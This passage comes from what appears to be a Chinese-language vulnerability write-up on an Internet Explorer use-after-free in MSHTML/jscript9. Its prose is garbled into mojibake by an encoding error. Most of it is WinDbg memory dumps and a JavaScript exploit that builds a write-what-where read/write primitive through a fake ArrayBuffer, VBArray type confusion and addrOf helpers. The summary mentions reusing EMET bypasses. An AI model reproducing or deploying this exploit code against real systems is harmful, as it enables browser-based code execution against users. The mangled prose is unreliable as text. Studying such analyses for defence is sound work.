<p>ç„¶è€Œå¦‚æœç›´æ¥è¿”å›åˆ°removeAttributeNodeï¼Œå½“è·å–Indexæ—¶å°±ä¼šå‘ç”ŸæŠ¥é”™ï¼Œä¸ºäº†é¿å…è¿™ç§æƒ…å†µæ·»åŠ äº†attributeåˆ°eleä¸­ï¼Œè¿™æ ·å°±èƒ½æˆåŠŸè·å–åˆ°åºå·ï¼Œæ‰§è¡ŒCAttrArray::Destroyå°†attræ‰€å ç”¨çš„å†…å­˜ç©ºé—´é‡Šæ”¾ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:009&gt; g
Breakpoint 0 hit
eax=0e30d7e0 ebx=00ebd201 ecx=7186bf00 edx=00000001 esi=10000003 edi=00000003
eip=73869e6b esp=05cec2d0 ebp=05cec338 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec320={MSHTML!CFastDOM::CElement::Trampoline_setAttribute (7186bf00)}	//ele.setAttribute('attribute', 1337)
0:009&gt; dd 0541f580 L4*4
0541f580  80000d04 8001141f 05384bc0 05cec4dc
0541f590  80000801 002dc6c2 0943b5b4 00000020
0541f5a0  80000801 002dc6c2 0943b5b4 00000020
0541f5b0  80000801 002dc6c2 0943b5b4 00000020
0:009&gt; dd 0943b5b4-4
0943b5b0  0002000a 00000000 00000000 00000000
0943b5c0  00000000 00000000 00000000 00000000
0943b5d0  00000000 00000000 00000000 00000000
0943b5e0  00000000 00000000 00000000 00000000
0943b5f0  00000000 00000000 00000000 00000000
0943b600  00000000 00000000 00000000 00000000
0943b610  00000000 00000000 00000000 00000000
0943b620  00000000 00000000 00000000 00000000
0:009&gt; g
Breakpoint 0 hit
eax=0e411fda ebx=00ebd201 ecx=7208fed0 edx=04001000 esi=02000002 edi=00000002
eip=73869e6b esp=05cec8d0 ebp=05cec934 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec91c={MSHTML!CFastDOM::CNode::Trampoline_Set_nodeValue (7208fed0)}
0:009&gt; dd 0541f580 L4*4		//æ‰§è¡Œå®Œæ¯•æ•´ä¸ªremoveAttributeNodeå‡½æ•°åï¼Œeleå†…æœ‰ä¸¤ä¸ªå…ƒç´ ï¼Œattræ‰€å å†…å­˜ä¹Ÿè¢«å†æ¬¡é‡Šæ”¾
0541f580  80000d04 8001141f 05384bc0 05cec4dc
0541f590  80000801 002dc6c1 0945bcbc 08d069d0
0541f5a0  80000801 002dc6c2 0943b5b4 00000020
0541f5b0  80000801 002dc6c2 0943b5b4 00000020
0:009&gt; dd 0943b5b4-4		//hd2.nodeValue
0943b5b0  09461fd8 093ff588 00000000 00000000
0943b5c0  00000000 00000000 00000000 00000000
0943b5d0  00000000 00000000 00000000 00000000
0943b5e0  00000000 00000000 00000000 00000000
0943b5f0  00000000 00000000 00000000 00000000
0943b600  00000000 00000000 00000000 00000000
0943b610  00000000 00000000 00000000 00000000
0943b620  00000000 00000000 00000000 00000000
</code></pre></div></div>

<p>è¯»å†™åŸè¯­hd2.nodeValueæ„é€ å®Œæ¯•ï¼Œæ¥ä¸‹æ¥é€šè¿‡hd2.nodeValueæ„é€ write-what-whereè¯»å†™åŸè¯­æ¥å®ç°åˆ©ç”¨ã€‚</p>

<h2 id="æ„é€ write-what-where">æ„é€ write-what-where</h2>

<p>æ„é€ write-what-whereè¯»å†™åŸè¯­EXPï¼š</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">dump</span><span class="p">(</span><span class="nx">nv</span><span class="p">)</span> <span class="p">{</span>
    <span class="kd">var</span> <span class="nx">ab</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">ArrayBuffer</span><span class="p">(</span><span class="mh">0x20010</span><span class="p">)</span>
    <span class="kd">var</span> <span class="nx">view</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">DataView</span><span class="p">(</span><span class="nx">ab</span><span class="p">)</span>
    <span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">nv</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="o">++</span><span class="nx">i</span><span class="p">)</span>
        <span class="nx">view</span><span class="p">.</span><span class="nx">setUint16</span><span class="p">(</span><span class="nx">i</span> <span class="o">*</span> <span class="mi">2</span> <span class="o">+</span> <span class="mi">4</span><span class="p">,</span> <span class="nx">nv</span><span class="p">.</span><span class="nx">charCodeAt</span><span class="p">(</span><span class="nx">i</span><span class="p">),</span> <span class="kc">true</span><span class="p">)</span>
    <span class="k">return</span> <span class="nx">ab</span>
<span class="p">}</span>

<span class="kd">function</span> <span class="nx">Data</span><span class="p">(</span><span class="nx">type</span><span class="p">,</span> <span class="nx">value</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">this</span><span class="p">.</span><span class="nx">type</span> <span class="o">=</span> <span class="nx">type</span>
    <span class="k">this</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="nx">value</span>
<span class="p">}</span>

<span class="kd">function</span> <span class="nx">setData</span><span class="p">(</span><span class="nx">i</span><span class="p">,</span> <span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
    <span class="kd">var</span> <span class="nx">arr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="nx">abf</span><span class="p">)</span>
    <span class="nx">arr</span><span class="p">[</span><span class="nx">i</span> <span class="o">*</span> <span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">type</span>
    <span class="nx">arr</span><span class="p">[</span><span class="nx">i</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">value</span>
<span class="p">}</span>

<span class="kd">function</span> <span class="nx">flush</span><span class="p">()</span> <span class="p">{</span>
    <span class="nx">hd1</span><span class="p">.</span><span class="nx">nodeValue</span> <span class="o">=</span> <span class="p">(</span><span class="k">new</span> <span class="nx">alloc1</span><span class="p">()).</span><span class="nx">nodeValue</span>
    <span class="nx">hd2</span><span class="p">.</span><span class="nx">nodeValue</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="nx">hd2</span> <span class="o">=</span> <span class="nx">hd1</span><span class="p">.</span><span class="nx">cloneNode</span><span class="p">()</span>
<span class="p">}</span>

<span class="kd">function</span> <span class="nx">read</span><span class="p">(</span><span class="nx">addr</span><span class="p">,</span> <span class="nx">size</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">switch</span> <span class="p">(</span><span class="nx">size</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">case</span> <span class="mi">8</span><span class="p">:</span>
            <span class="k">return</span> <span class="nx">god</span><span class="p">.</span><span class="nx">getUint8</span><span class="p">(</span><span class="nx">addr</span><span class="p">)</span>
        <span class="k">case</span> <span class="mi">16</span><span class="p">:</span>
            <span class="k">return</span> <span class="nx">god</span><span class="p">.</span><span class="nx">getUint16</span><span class="p">(</span><span class="nx">addr</span><span class="p">,</span> <span class="kc">true</span><span class="p">)</span>
        <span class="k">case</span> <span class="mi">32</span><span class="p">:</span>
            <span class="k">return</span> <span class="nx">god</span><span class="p">.</span><span class="nx">getUint32</span><span class="p">(</span><span class="nx">addr</span><span class="p">,</span> <span class="kc">true</span><span class="p">)</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kd">function</span> <span class="nx">write</span><span class="p">(</span><span class="nx">addr</span><span class="p">,</span> <span class="nx">value</span><span class="p">,</span> <span class="nx">size</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">switch</span> <span class="p">(</span><span class="nx">size</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">case</span> <span class="mi">8</span><span class="p">:</span>
            <span class="k">return</span> <span class="nx">god</span><span class="p">.</span><span class="nx">setUint8</span><span class="p">(</span><span class="nx">addr</span><span class="p">,</span> <span class="nx">value</span><span class="p">)</span>
        <span class="k">case</span> <span class="mi">16</span><span class="p">:</span>
            <span class="k">return</span> <span class="nx">god</span><span class="p">.</span><span class="nx">setUint16</span><span class="p">(</span><span class="nx">addr</span><span class="p">,</span> <span class="nx">value</span><span class="p">,</span> <span class="kc">true</span><span class="p">)</span>
        <span class="k">case</span> <span class="mi">32</span><span class="p">:</span>
            <span class="k">return</span> <span class="nx">god</span><span class="p">.</span><span class="nx">setUint32</span><span class="p">(</span><span class="nx">addr</span><span class="p">,</span> <span class="nx">value</span><span class="p">,</span> <span class="kc">true</span><span class="p">)</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kd">function</span> <span class="nx">writeData</span><span class="p">(</span><span class="nx">addr</span><span class="p">,</span> <span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">data</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="o">++</span><span class="nx">i</span><span class="p">)</span>
        <span class="nx">write</span><span class="p">(</span><span class="nx">addr</span> <span class="o">+</span> <span class="nx">i</span><span class="p">,</span> <span class="nx">data</span><span class="p">[</span><span class="nx">i</span><span class="p">],</span> <span class="mi">8</span><span class="p">)</span>
<span class="p">}</span>

<span class="kd">function</span> <span class="nx">addrOf</span><span class="p">(</span><span class="nx">obj</span><span class="p">)</span> <span class="p">{</span>
    <span class="nx">arr</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="nx">obj</span>
    <span class="k">return</span> <span class="nx">read</span><span class="p">(</span><span class="nx">pArr</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span>
<span class="p">}</span>

<span class="kd">var</span> <span class="nx">leak</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="nx">dump</span><span class="p">(</span><span class="nx">hd2</span><span class="p">.</span><span class="nx">nodeValue</span><span class="p">))</span>
<span class="kd">var</span> <span class="nx">pAbf</span> <span class="o">=</span> <span class="nx">leak</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span>		<span class="c1">//fake</span>
<span class="kd">var</span> <span class="nx">pArr</span> <span class="o">=</span> <span class="nx">leak</span><span class="p">[</span><span class="mi">10</span><span class="p">]</span>		<span class="c1">//arr</span>
<span class="kd">var</span> <span class="nx">VT_I4</span> <span class="o">=</span> <span class="mh">0x3</span>
<span class="kd">var</span> <span class="nx">VT_DISPATCH</span> <span class="o">=</span> <span class="mh">0x9</span>
<span class="kd">var</span> <span class="nx">VT_BYREF</span> <span class="o">=</span> <span class="mh">0x4000</span>
<span class="kd">var</span> <span class="nx">bufArr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Array</span><span class="p">(</span><span class="mh">0x10</span><span class="p">)</span>
<span class="kd">var</span> <span class="nx">fakeArr</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Uint32Array</span><span class="p">(</span><span class="nx">fake</span><span class="p">)</span>

<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mh">0x10</span><span class="p">;</span> <span class="o">++</span><span class="nx">i</span><span class="p">)</span> <span class="nx">setData</span><span class="p">(</span><span class="nx">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="k">new</span> <span class="nx">Data</span><span class="p">(</span><span class="nx">VT_BYREF</span> <span class="o">|</span> <span class="nx">VT_I4</span><span class="p">,</span> <span class="nx">pAbf</span> <span class="o">+</span> <span class="nx">i</span> <span class="o">*</span> <span class="mi">4</span><span class="p">))</span>
<span class="nx">flush</span><span class="p">()</span>
<span class="kd">var</span> <span class="nx">ref</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">VBArray</span><span class="p">(</span><span class="nx">hd0</span><span class="p">.</span><span class="nx">nodeValue</span><span class="p">)</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mh">0x10</span><span class="p">;</span> <span class="o">++</span><span class="nx">i</span><span class="p">)</span> <span class="nx">bufArr</span><span class="p">[</span><span class="nx">i</span><span class="p">]</span> <span class="o">=</span> <span class="nx">ref</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="nx">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span>	<span class="c1">//bufArr[0] = fake,bufArr[1] = arr</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="kc">null</span>
<span class="nx">setData</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="k">new</span> <span class="nx">Data</span><span class="p">(</span><span class="nx">VT_BYREF</span> <span class="o">|</span> <span class="nx">VT_I4</span><span class="p">,</span> <span class="nx">bufArr</span><span class="p">[</span><span class="mi">4</span><span class="p">]))</span>				<span class="c1">//fakeArray</span>
<span class="nx">setData</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="k">new</span> <span class="nx">Data</span><span class="p">(</span><span class="nx">VT_BYREF</span> <span class="o">|</span> <span class="nx">VT_I4</span><span class="p">,</span> <span class="nx">bufArr</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x04</span><span class="p">))</span>		<span class="c1">//fakeArray+0x4</span>
<span class="nx">setData</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="k">new</span> <span class="nx">Data</span><span class="p">(</span><span class="nx">VT_BYREF</span> <span class="o">|</span> <span class="nx">VT_I4</span><span class="p">,</span> <span class="nx">bufArr</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x1c</span><span class="p">))</span>		<span class="c1">//fakebuffer</span>
<span class="nx">flush</span><span class="p">()</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">VBArray</span><span class="p">(</span><span class="nx">hd0</span><span class="p">.</span><span class="nx">nodeValue</span><span class="p">)</span>
<span class="kd">var</span> <span class="nx">vt</span> <span class="o">=</span> <span class="nx">ref</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="kd">var</span> <span class="nx">gc</span> <span class="o">=</span> <span class="nx">ref</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>
<span class="kd">var</span> <span class="nx">bs</span> <span class="o">=</span> <span class="nx">ref</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="kc">null</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mi">16</span><span class="p">;</span> <span class="o">++</span><span class="nx">i</span><span class="p">)</span> <span class="nx">fakeArr</span><span class="p">[</span><span class="nx">i</span><span class="p">]</span> <span class="o">=</span> <span class="nx">bufArr</span><span class="p">[</span><span class="nx">i</span><span class="p">]</span>
<span class="nx">fakeArr</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="nx">bs</span> <span class="o">+</span> <span class="mh">0x40</span>			
<span class="nx">fakeArr</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="nx">vt</span>
<span class="nx">fakeArr</span><span class="p">[</span><span class="mi">17</span><span class="p">]</span> <span class="o">=</span> <span class="nx">gc</span>					
<span class="nx">fakeArr</span><span class="p">[</span><span class="mi">24</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xffffffff</span>			<span class="c1">//buffersize</span>
<span class="nx">setData</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="k">new</span> <span class="nx">Data</span><span class="p">(</span><span class="nx">VT_DISPATCH</span><span class="p">,</span> <span class="nx">bs</span><span class="p">))</span>
<span class="nx">flush</span><span class="p">()</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">VBArray</span><span class="p">(</span><span class="nx">hd0</span><span class="p">.</span><span class="nx">nodeValue</span><span class="p">)</span>	<span class="c1">//abf[0]</span>
<span class="nx">god</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">DataView</span><span class="p">(</span><span class="nx">ref</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span>	<span class="c1">//write-what-whereè¯»å†™åŸè¯­</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="kc">null</span>
<span class="nx">pArr</span> <span class="o">=</span> <span class="nx">read</span><span class="p">(</span><span class="nx">read</span><span class="p">(</span><span class="nx">pArr</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x14</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x10</span>
<span class="nx">write</span><span class="p">(</span><span class="nx">read</span><span class="p">(</span><span class="nx">addrOf</span><span class="p">(</span><span class="nx">hd0</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x18</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x28</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span>
</code></pre></div></div>

<p>æ‰§è¡Œhd0.nodeValue = allocåï¼Œæ­¤æ—¶çš„hd2.nodeValueè¯»å†™åŸè¯­ä¼šè¢«dic1.items()æ›¿æ¢ï¼Œå¹¶èµ‹å€¼ç»™hd0.nodeValueï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:009&gt; g
Breakpoint 0 hit
eax=0e411fda ebx=00ebd201 ecx=7208fed0 edx=04001000 esi=02000002 edi=00000002
eip=73869e6b esp=05cec8d0 ebp=05cec934 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec91c={MSHTML!CFastDOM::CNode::Trampoline_Set_nodeValue (7208fed0)	//hd0.nodeValue = alloc
0:009&gt; p
eax=00000000 ebx=00ebd201 ecx=73783070 edx=41004000 esi=02000002 edi=00000002
eip=73869e6e esp=05cec8d0 ebp=05cec934 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18e:
73869e6e 8b65d4          mov     esp,dword ptr [ebp-2Ch] ss:002b:05cec908=05cec8e0
0:009&gt; dd 0943b5b4-4	//dic1.items()å·²ç»å æ®äº†hd2.nodeValueçš„å†…å­˜ç©ºé—´
0943b5b0  0000200c 00000000 06ff1320 00000000
0943b5c0  00000009 00000000 0963cd44 00000000
0943b5d0  00000009 00000000 09649004 00000000
0943b5e0  00000003 00000000 12341234 00000000
0943b5f0  00000003 00000000 12341234 00000000
0943b600  00000003 00000000 12341234 00000000
0943b610  00000003 00000000 12341234 00000000
0943b620  00000003 00000000 12341234 00000000
</code></pre></div></div>

<p>éšååˆ›å»ºhd2.nodeValueçš„Uint32Array leakï¼Œè¯¥æ•°ç»„çš„ä½œç”¨å°±æ˜¯å°†fakeå’Œarræ•°ç»„çš„å†…å­˜åœ°å€æ³„éœ²å‡ºæ¥ï¼ŒpAbfå­˜æ”¾çš„æ˜¯fakeï¼ŒpArrå­˜æ”¾çš„æ˜¯arrï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:009&gt; g
Breakpoint 0 hit
eax=0e40dd64 ebx=00ebd201 ecx=7206eb20 edx=40000010 esi=02000001 edi=00000001
eip=73869e6b esp=05cec878 ebp=05cec8dc iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec8c4={MSHTML!CFastDOM::CNode::Trampoline_Get_nodeValue (7206eb20)}
0:009&gt; p
eax=0c564010 ebx=00ebd201 ecx=73783070 edx=41004000 esi=02000001 edi=00000001
eip=73869e6e esp=05cec878 ebp=05cec8dc iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18e:
73869e6e 8b65d4          mov     esp,dword ptr [ebp-2Ch] ss:002b:05cec8b0=05cec888
0:009&gt; dd 0943b5b4-4	//hd2.nodeValue
0943b5b0  0000200c 00000000 06ff1320 00000000
0943b5c0  00000009 00000000 0963cd44 00000000	//fake
0943b5d0  00000009 00000000 09649004 00000000	//arr
0943b5e0  00000003 00000000 12341234 00000000
0943b5f0  00000003 00000000 12341234 00000000
0943b600  00000003 00000000 12341234 00000000
0943b610  00000003 00000000 12341234 00000000
0943b620  00000003 00000000 12341234 00000000
0:009&gt; dd 0963cd44 L8
0963cd44  73705654 73705638 7370562c 73705610
0963cd54  0963fed0 05d40888 00000000 00000002
0:009&gt; dd 0963fed0 L9	//è¯¥å¤„æ­£æ˜¯fakeçš„å†…å­˜åœ°å€
0963fed0  7370514c 08dcc8c0 00000000 00000000
0963fee0  00000000 00000000 00000000 05d4d338
0963fef0  00000100
</code></pre></div></div>

<p>ç»§ç»­æ‰§è¡Œåˆ°flush()å¤„ï¼ŒåŸæœ¬çš„abfå·²ç»å­˜æ”¾äº†fakeæ‰€åœ¨çš„å†…å­˜ç»“æ„ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:009&gt; g
Breakpoint 0 hit
eax=0e407f58 ebx=00ebd201 ecx=7203fac0 edx=01000100 esi=02000002 edi=00000002
eip=73869e6b esp=05cec538 ebp=05cec5a0 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec588={MSHTML!CFastDOM::CDocument::Trampoline_createAttribute (7203fac0)}	//flush()
0:009&gt; dd 963ff00 L9	//abf
0963ff00  7370514c 08dcc8c0 00000000 00000000
0963ff10  00000000 095f8ee0 0c770460 05d61fe8
0963ff20  00020010
0:009&gt; dd 05d61fe8 L11*4	//abfä¸­çš„å†…å®¹ï¼Œå…¶ä¸­abf[1]ä¸­å­˜æ”¾çš„å€¼å°±æ˜¯fake
05d61fe8  00000000 00000000 00000000 00000000
05d61ff8  00004003 00000000 0963cd44 00000000
05d62008  00004003 00000000 0963cd48 00000000
05d62018  00004003 00000000 0963cd4c 00000000
05d62028  00004003 00000000 0963cd50 00000000
05d62038  00004003 00000000 0963cd54 00000000
05d62048  00004003 00000000 0963cd58 00000000
05d62058  00004003 00000000 0963cd5c 00000000
05d62068  00004003 00000000 0963cd60 00000000
05d62078  00004003 00000000 0963cd64 00000000
05d62088  00004003 00000000 0963cd68 00000000
05d62098  00004003 00000000 0963cd6c 00000000
05d620a8  00004003 00000000 0963cd70 00000000
05d620b8  00004003 00000000 0963cd74 00000000
05d620c8  00004003 00000000 0963cd78 00000000
05d620d8  00004003 00000000 0963cd7c 00000000
05d620e8  00004003 00000000 0963cd80 00000000
0:009&gt; dd poi(0963cd44+10) L9	//fake
0963fed0  7370514c 08dcc8c0 00000000 00000000
0963fee0  00000000 09609100 00000000 05d4d338
0963fef0  00000100
</code></pre></div></div>

<p>å½“æ‰§è¡Œåˆ°var ref = new VBArray(hd0.nodeValue)æ—¶ï¼ŒæŸ¥çœ‹hd0çš„å†…å­˜ï¼Œå‘ç°hd0.nodeValueå·²ç»è¢«abfè¦†ç›–ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:009&gt; g
Breakpoint 0 hit
eax=0e413ed6 ebx=00ebd201 ecx=7209f6b0 edx=00400040 esi=02000001 edi=00000001
eip=73869e6b esp=05cec7b0 ebp=05cec810 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec7f8={MSHTML!CFastDOM::CNode::Trampoline_cloneNode (7209f6b0)}
0:009&gt; g
Breakpoint 0 hit
eax=0e40dd64 ebx=00ebd201 ecx=7206eb20 edx=40000010 esi=02000001 edi=00000001
eip=73869e6b esp=05cec878 ebp=05cec8dc iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec8c4={MSHTML!CFastDOM::CNode::Trampoline_Get_nodeValue (7206eb20)}	//var ref = new VBArray(hd0.nodeValue)
0:009&gt; dd 05387200 L10	//hd0
05387200  715961ec 00000001 00000001 00000008
05387210  00000000 00000000 0a2f9cf0 00000000
05387220  ffffffff 093b32c4 0000200c 00000000
05387230  06ff1680 00000000 05382370 00000000
0:009&gt; du 093b32c4 
093b32c4  "handle"
0:009&gt; dd 06ff1680 L4
06ff1680  08800001 00000010 00000000 0943b5b0
0:009&gt; dd 0943b5b0		//hd0.nodeValue
0943b5b0  0002000a 00000000 00000000 00000000
0943b5c0  00004003 00000000 0963cd44 00000000
0943b5d0  00004003 00000000 0963cd48 00000000
0943b5e0  00004003 00000000 0963cd4c 00000000
0943b5f0  00004003 00000000 0963cd50 00000000
0943b600  00004003 00000000 0963cd54 00000000
0943b610  00004003 00000000 0963cd58 00000000
0943b620  00004003 00000000 0963cd5c 00000000
</code></pre></div></div>

<p>éšåé€šè¿‡setDataæ–¹æ³•å°†abf[1]æ„é€ æˆä¸€ä¸ªArrayBufferç»“æ„ï¼Œè·å–abf[1]åˆ°godä¸­ï¼Œæ‰§è¡Œåˆ°god = new DataView(ref.getItem(1))æ—¶ï¼Œabfçš„å†…å­˜ç»“æ„å¦‚ä¸‹ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image2022-2-12_22-17-41.png" alt="" /></p>

<p>write-what-whereè¯»å†™åŸè¯­æ„é€ å®Œæ¯•ï¼Œéšåé€šè¿‡è¯¥è¯»å†™åŸè¯­è·å–å‡½æ•°åœ°å€ï¼Œè°ƒç”¨æœ€ç»ˆå®ç°åˆ©ç”¨ã€‚</p>

<h1 id="æ€»ç»“">æ€»ç»“</h1>

<p>æ­¤æ¬¡åˆ©ç”¨çš„æ‰‹æ³•å’Œä¹‹å‰åˆ†æè¿‡çš„word EPSæ–‡ä»¶æ¼æ´ååˆ†ç›¸ä¼¼ï¼ŒEPSå’ŒJSéƒ½æ˜¯è„šæœ¬è¯­è¨€ï¼Œå…±åŒç‚¹éƒ½æ˜¯é€šè¿‡UAFæ¥è¦†ç›–é‡Šæ”¾åçš„å†…å­˜ç»“æ„ï¼Œæ„é€ ä¸€æ®µè¯»å†™åŸè¯­ï¼Œå†é€šè¿‡è¯»å†™åŸè¯­å†™å…¥æ„é€ å¥½çš„write-what-whereå­—ç¬¦ä¸²çš„ç»“æ„ã€‚é€šè¿‡write-what-whereå­—ç¬¦ä¸²ä¾¿å¯ä»¥è½»æ¾å®ç°å‡½æ•°çš„è·å–å’Œè°ƒç”¨äº†ã€‚</p>

<p>ä¸åŒç‚¹åœ¨äºJSå¯¹è±¡å’ŒEPSçš„å¯¹è±¡ç»“æ„åœ¨å†…å­˜çš„å¸ƒå±€ä¸åŒï¼Œå¯¼è‡´åˆ©ç”¨æ—¶éœ€è¦äº†è§£JSå¯¹è±¡çš„å†…å­˜å¸ƒå±€åæ‰èƒ½æ„é€ å‡ºwrite-what-whereå­—ç¬¦ä¸²ï¼Œåœ¨EPSä¸­çš„åˆ©ç”¨æ‰‹æ³•å¦‚ç»•è¿‡EMETçš„R3HOOKå’ŒEAFå¯ä»¥åœ¨IEæ¼æ´ä¸­å¤ç”¨ã€‚</p>

